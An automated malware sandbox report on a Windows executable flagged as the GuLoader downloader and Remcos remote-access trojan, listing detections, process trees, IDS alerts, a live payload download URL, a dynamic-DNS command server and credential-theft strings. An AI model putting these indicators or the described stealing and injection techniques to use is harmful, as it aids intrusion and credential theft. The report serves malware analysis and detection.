Windows Analysis Report
#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe

Overview

General Information

Sample Name:#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
Analysis ID:1332661
MD5:8b1422d6b17dd727c69291aa1ff09481
SHA1:b09ac93ef0313867a755e59cf4b108ee5b376754
SHA256:f08ab03484809d162963cf54a40b81f7722a83984744ecc79f4626b75b829b46
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Yara detected GuLoader
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to steal Mail credentials (via file registry)
Contains functionality to modify clipboard data
Yara detected WebBrowserPassView password recovery tool
Uses dynamic DNS services
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe (PID: 8164 cmdline: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe MD5: 8B1422D6B17DD727C69291AA1FF09481)
    • wab.exe (PID: 2856 cmdline: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 3368 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oicgkvnekjmivsgoxokizzeblgyngayb MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 1236 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rdhzl MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 5976 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bxujegjz MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\paqlgkfs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000005.00000002.49572727235.0000000003718000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe PID: 8164 | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security |
Process Memory Space: wab.exe PID: 2856 | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security |
Process Memory Space: wab.exe PID: 2856 | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
              No Sigma rule has matched
              Timestamp:10/26/23-14:28:47.709544
              Source IP:192.168.11.20
              Destination IP:217.147.225.69
              SID:2855192
              Source Port:50054
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:10/26/23-14:35:12.486265
              Source IP:94.156.6.253
              Destination IP:192.168.11.20
              SID:2032777
              Source Port:2402
              Destination Port:50055
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:10/26/23-14:28:50.518465
              Source IP:192.168.11.20
              Destination IP:94.156.6.253
              SID:2032776
              Source Port:50055
              Destination Port:2402
              Protocol:TCP
              Classtype:A Network Trojan was detected

              AV Detection

              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe, Virustotal: Detection: 20%
              Source: Yara match, File source: 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: wab.exe PID: 2856, type: MEMORYSTR
              Source: Yara match, File source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe, Avira: detected
              Source: ourt2949aslumes9.duckdns.org, Virustotal: Detection: 13%
              Source: C:\Users\user\AppData\Local\Temp\Gummibaand\Tramper.exe, Avira: detection malicious, Label: HEUR/AGEN.1338455
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe, Code function: 5_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_004059CC
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe, Code function: 5_2_004065FD FindFirstFileW,FindClose,5_2_004065FD
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe, Code function: 5_2_00402868 FindFirstFileW,5_2_00402868
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 7_2_352D10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_352D10F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 7_2_352D6580 FindFirstFileExA,7_2_352D6580
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 9_2_0040AE51 FindFirstFileW,FindNextFileW,9_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 10_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407C87
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, File opened: C:\Users\user\AppData\Roaming\paqlgkfs.dat
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, File opened: C:\Users\user\AppData\Local\Temp\bxujegjz
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, File opened: C:\Users\user\AppData\Local\Temp\rdhzl
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, File opened: C:\Users\user\
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, File opened: C:\Users\user\AppData\
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, File opened: C:\Users\user\AppData\Local\

              Networking

              Source: Traffic, Snort IDS: 2855192 ETPRO TROJAN GuLoader Encoded Binary Request M2 192.168.11.20:50054 -> 217.147.225.69:80
              Source: Traffic, Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.11.20:50055 -> 94.156.6.253:2402
              Source: Traffic, Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 94.156.6.253:2402 -> 192.168.11.20:50055
              Source: unknown, DNS query: name: ourt2949aslumes9.duckdns.org
              Source: Joe Sandbox View, ASN Name: NET1-ASBG
              Source: Joe Sandbox View, ASN Name: GRENA-ASTbilisiGeorgiaGE
              Source: global traffic, HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
              Source: Joe Sandbox View, IP Address: 94.156.6.253
              Source: Joe Sandbox View, IP Address: 178.237.33.50
              Source: global traffic, HTTP traffic detected: GET /IogvoayYhe139.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: gudanidevelopment.ge | Cache-Control: no-cache
              Source: global traffic, TCP traffic: 192.168.11.20:50055 -> 94.156.6.253:2402
              Source: unknown, TCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: wab.exe, 00000007.00000002.54485681162.00000000352A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmp, String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmp, String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000009.00000003.49635884632.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login@!id equals www.facebook.com (Facebook)
              Source: wab.exe, 00000009.00000003.49635884632.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login@!id equals www.yahoo.com (Yahoo)
in":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFound
              Source: wab.exe, 00000009.00000003.49632682724.00000000051C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","doma
in":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFound
              Source: wab.exe, 00000009.00000003.49631698308.00000000051C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.co
m"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"o
              Source: wab.exe, 00000009.00000003.49631698308.00000000051C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.co
m"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"o
              Source: wab.exe, 00000007.00000002.54485525601.0000000035210000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000007.00000002.54485525601.0000000035210000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp3
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp=
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpR
              Source: wab.exe, 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpn
              Source: wab.exe, 00000007.00000002.54465818643.0000000000EE0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000007.00000002.54464219226.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://gudanidevelopment.ge/IogvoayYhe139.bin
              Source: wab.exe, 00000007.00000002.54465818643.0000000000EE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://gudanidevelopment.ge/IogvoayYhe139.binVascGiltathirchimie.com/IogvoayYhe139.bin
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe, Tramper.exe.7.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: wab.exe, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.49607571174.00000000039ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com
              Source: wab.exe, 0000000B.00000002.49606634491.0000000000F8C000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com/hnS
              Source: wab.exe, 0000000B.00000002.49607571174.00000000039ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.comata
              Source: wab.exe, 00000007.00000002.54485681162.00000000352A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 00000007.00000002.54485681162.00000000352A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 00000009.00000002.49637274715.00000000030E3000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
              Source: bhv7197.tmp.9.drString found in binary or memory: http://x.ss2.us/x.cer0&
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.double(
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doublecli
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activ
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activ(
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activiH
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49631826682.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49628718013.00000000051C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626062080.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627438697.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49631961904.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49631062841.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49632061224.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49631698308.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630734774.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
              Source: bhv7197.tmp.9.drString found in binary or memory: https://acdn.adnxs.com/ast/ast.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html
              Source: bhv7197.tmp.9.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
